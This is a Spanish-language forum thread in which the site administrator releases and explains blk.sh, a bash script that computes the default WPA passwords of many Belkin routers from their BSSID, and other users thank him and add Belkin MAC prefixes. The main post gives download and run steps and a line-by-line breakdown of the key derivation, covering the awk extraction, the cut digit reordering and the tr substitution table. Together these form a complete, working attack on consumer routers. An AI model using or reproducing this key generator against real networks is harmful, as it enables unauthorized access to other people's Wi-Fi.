El libre pensamiento para un internet libre

No estas registrado.  

#1 07-07-2015 16:57:28

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 5,730

blk.sh : Generador de llaves por defecto de los routers Belkin

  • Nombre :                      blk.sh

  • Autor :                          kcdtv

  • Licencia :                     GNU GPL v3

  • Lenguaje :                    bash

  • Dependencias :              no

  • Créditos :                     - algoritmo  : Numlock (Como se genera la llave WPA por defecto de numerosos modelos Belkin)
                                       - código : kcdtv

  • Fecha de publicación :  copyelft 7 julio 2015

  • Sitio(s) web:                 www.wifi-libre.com y www.crack-wifi.com

  • Descripción :                El usuario introduce el bssid de la red del dispositivo y el script devuelve en salida las tres contraseñas posibles por defecto

blk1.jpg

                           Blk.sh 
     Generador de la contraseña WPA por defecto de rouetrs fabricados por Belkin
                  ¡Al menos 18 modelos diferentes soportados!

  Encontrareis todos los detalles sobre la brecha que explota blk.sh en el tema " Como se genera la llave WPA por defecto de numerosos modelos Belkin"
  Para que quede bien claro : blk.sh se basa enteramente en el PDF de Numlock dónde explica como se generan las llaves WPA por defecto de estos modelos.

Instrucciones de uso

Es un script sencillo en bash que se puede ejecutar en un terminal de cualquier distribución GNU-linux.
Para ello debemos

  1. Descargar el script:
    Se encuentra en un paquete *.zip en descarga directa aquí : blk.zip o en linea de comando

    wget https://www.wifi-libre.com/img/members/3/blk.zip

     

  2. Descomprimir el paquete descargado :
    Con un clic derecho y "extraer aqui" o bien en la misma terminal

    unzip blk.zip
  3. Situarse en el directorio que lo contiene :
    Hacer click derecho + "abrir terminal aquí" en la carpeta descomprimida "blk"o bien en linea de comando

    cd blk
  4. Ejecutar el script

    bash blk.sh

  El script se abre y pide que entramos el bSSID (este tiene que ser entero y con sus dos puntitos - la más conveniente es copiar y pegarlo desde una ventana de escaneo con airodump-ng )

blk2.jpg

  Una vez hecho (entrar el bSSID);  el script devuelve en consola las tres contraseñas posibles según el tipo de essid y modelo:

blk3.jpg

Descargas

Desconectado

#2 07-07-2015 20:43:13

d1k0w0ns
Expulsado

Registrado: 12-06-2015
Mensajes: 374

Re: blk.sh : Generador de llaves por defecto de los routers Belkin

estas que no paras xD

Desconectado

#3 07-07-2015 23:21:45

dynyly
Usuario

Registrado: 19-04-2015
Mensajes: 315

Re: blk.sh : Generador de llaves por defecto de los routers Belkin

gracias
ayer estaba el tutorial explicando todo el proceso y al dia siguiente la tool


mil gracias por tu animo al compartir conocimiento
saludos

Desconectado

#4 07-07-2015 23:58:29

d1k0w0ns
Expulsado

Registrado: 12-06-2015
Mensajes: 374

Re: blk.sh : Generador de llaves por defecto de los routers Belkin

añadidas las macs de belkin segun oui en el script,
queda mejor con esa info no?
nunca le pones las macs no se puede buscar por el nombre o modelo
y no encontre ninguna en las cercanias para probar.

9ac0a16a778e452f33656f0c0c632629.png

Desconectado

#5 08-07-2015 02:59:28

dynyly
Usuario

Registrado: 19-04-2015
Mensajes: 315

Re: blk.sh : Generador de llaves por defecto de los routers Belkin

gracias
por mejorar un poquito las cosas aportando
joder tio mira que leo los tutos que ay de como cambiar scrpits pero no me entero; es que has echo todo lo que pensaba que le faltaban a este informando de macs  y al de las trendnet diciendo que no es mac vulnerable o que no lo es
saludos

Desconectado

#6 08-07-2015 16:49:12

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 5,730

Re: blk.sh : Generador de llaves por defecto de los routers Belkin

gracias
ayer estaba el tutorial explicando todo el proceso y al dia siguiente la tool

Es que no es muy complicado para hacer el algoritmo.
La parte que pide que se entra el BSID y esto es exactamente la misma que en el script trendnet. solo tenía que codificar el algoritmo
  Vas a ver lo fácil que es.... Voy a hacer el caso de los Belkin.XXX de forma muy simple

Con la parte ya hecha el usuario entra el BSID y esta guardado en una variable llamada BSSID.
  Esta en su formato bruto XX:XX:XX:XX:XX:XX.

¿Que tenemos que hacer para llegar a la lave WPA?

  1. "Depurar" el bSSID. En este caso queremos guardar solo los 8 últimos dígitos

  2. Mezclar los dígitos siguiendo el patrón

  3. Pasar los digitos por la table de conversiones

3 cosas que se pueden hacer en tres lineas

1. Depurar con awk

  Se puede hacer con cut o grep pero awk es mas directo.
Tomamos un hipotético BSSID " 00:11:22:33:44:55 " y entonces tenemos primero que  sacar "22334455" (quitar los dos puntitos y guardar los 8 últimos digitos del BSSID)
  Lo vamos a guardar en una variable llamada "FINMAC" que podemos declarar así : 

FINMAC=$( echo $BSSID | awk -F':' '{ print $3$4$5$6 }' )

- En la primera parte del pipe ( a la izquierda del palito "|" )  tenemos echo $BSSID : esto es para escribir el valor de la mac que ha entrado el usuario. El resultado (11:22:33:44:55:66) se manda gracias al pipe a la ordén awk dónde depuramos

awk -F' :' '{ print $3$4$5$6 }'

  • awk = Invocamos awk para depurar

  • -F = Usamos el opción "Field" (campo). Un campo es un espacio entre dos delimitadores. lo explico enseguida...

  • ' :' = Elegimos como delimitador dos puntitos ( ':'). Esto signifca que nuestros campos están definidos por el simbolo :. Si tomamos nuestra mac hipotética, 11 será un campo, 22 sera otro campo, 33 otro etc... cada vez que tenemos nuestro delimitador (dos puntos) hacemos un corte.

  • '{ print $3$4$5$6 }' = Con print vamos a escribir-guardar los campos que indicamos. $3 es para poner el campo numero 3 ( 33 en nuestro ejemplo )
    $4 es para poner el campo 4 ( 44 en nuestro caso) etc...

 

blk4.jpg

Pasamos a la segunda fase :

2 mezclar los dígitos con cut

Tenemos entonces a nuestra variable FINMAC ( valor 334455666 ) y tenemos que mezclar siguiendo el orden expuesto por Numlock : :62:38:51:74 (primero ponemos el dígito 6, luego viene el segundo (el mismo) etc...) si no me equivoco deberíamos tener al final 53:46:53:64 dejaremos bash trabajar para nosotros...
Vamos a declarar una variable llamada "MIXMAC" para guardar la mac depurada y mezclada según el patrón
Lo que sigue es código bastante feo
con cut y el argumento -b puedo recortar el byte que quiero de mis cadenas. Cada caractere es un byte. O sea, si quiero tener el sexto carácter de "FINMAC" (el primero que se pone en la cadena que queremos formar), lo puedo hacer así :

echo $FINMAC | cut -b 6-6

con 6-6 indico a cut que recorte del sexto al sexto byte (entonces guardara solo el sexto dígito de FINMAC (un cinco))
Lo podéis ver aqui

kcdtv@profezorapplestruff:~$ echo $FINMAC | cut -b 6-6
5

Pues para guardar todo reordenado voy a crear una variable algo horrible dónde voy a cortar uno a uno los bytes elgidos para guardar los en el orden deseado
para poder usar ordenes a dentro de una variable se ponen entre ` `

var=$(`orden1``orden2`)

para nosotros sera  entonces

MIXMAC=$( echo "`echo $FINMAC | cut -b 6-6``echo $FINMAC | cut -b 2-2``echo $FINMAC | cut -b 3-3``echo $FINMAC | cut -b 8-8``echo $FINMAC | cut -b 5-5``echo $FINMAC | cut -b 1-1``echo $FINMAC | cut -b 7-7``echo $FINMAC | cut -b 4-4`") 

hemos repetido y añadido unas después las otras secuencia con echo + cut donde pillamos un solo carácter

blk5.jpg

3 ultimo paso: pasar por la tabla de conversión contr

con tr podemos cambiar unos caracteres por otros. De forma muy simple :

tr <simbolo_a_cambiar> <simbolo_por_poner_en_su_lugar>

Si quiero cambiar el C mayúscula por un c en ColaCao lo hago así

kcdtv@profezorapplestruff:~$ echo ColaCao | tr C c
colacao

y he obtenido colcao
¿Y si quiero cambiar el C mayúsculas por minusulas y también cambiar el a minúsculas por un A mayúsculas?
Simplemente añadimos el cambio para formar una lista de dos cambios

kcdtv@profezorapplestruff:~$ echo ColaCao | tr Ca cA
colAcAo

Y hemos hecho un cambio con una tabla de valores (de dos casos)
Ya lo veís:  con la orden tr podemos hacer la ultima fase en una sola linea muy simple copiando y pegando desde el PDF de numlock los valores por cambiar y su resultado
Así

echo $MIXMAC | tr 1234569ABCDE 246135ACE9BD

nos devuelve el pass WPA... blk6.jpg

En tres liñas hemos pasado del bssid al pass big_smile

añadidas las macs de belkin segun oui en el script,
queda mejor con esa info no?
nunca le pones las macs no se puede buscar por el nombre o modelo
y no encontre ninguna en las cercanias para probar.

¿Verde otra vez? No entiendo tu fijación con el verde... y con las mac.
Olvidate de poner mac verdes por todos lados y usa el opción --manufacturer en tus scan : en lugar de tener que verificar con tu listado verde lo verás al vuelo y en directo y además con una lista OUI que se actualizará. No necesitarás ni ejecutar el script para saber si las mac son susceptibles de ser atacadas y te ahorras mucho tiempo en lugar de retocar ciodigo y ejecutar lo para algo que hace airodump-ng solito y mejor wink

Desconectado

Temas similares

Tema Respuestas Vistas Ultimo mensaje
2 164 Hoy 15:25:52 por Patcher
Pegado:
521 339979 10-05-2023 18:24:28 por Betis-Jesus
Hospital clinic dump por wifiyeah  [ 1 2 ]
27 1242 09-05-2023 21:32:44 por kcdtv
Hacktivismo por CHARGER22
1 205 08-05-2023 19:53:26 por kcdtv
Pegado:
Pegado:: Script multiuso wifi para Kali y otras distros por v1s1t0r  [ 1 2 3 18 ]
447 66089 22-04-2023 15:31:13 por kcdtv

Pie de página

Información del usuario

Ultimo usuario registrado: klurosu
Usuarios registrados conectados: 0
Invitados conectados: 6

Estadisticas de los foros

Número total de usuarios registrados: 2,446
Número total de temas: 1,637
Número total de mensajes: 15,586

Máx. usuarios conectados: 373 el 30-09-2019 15:04:36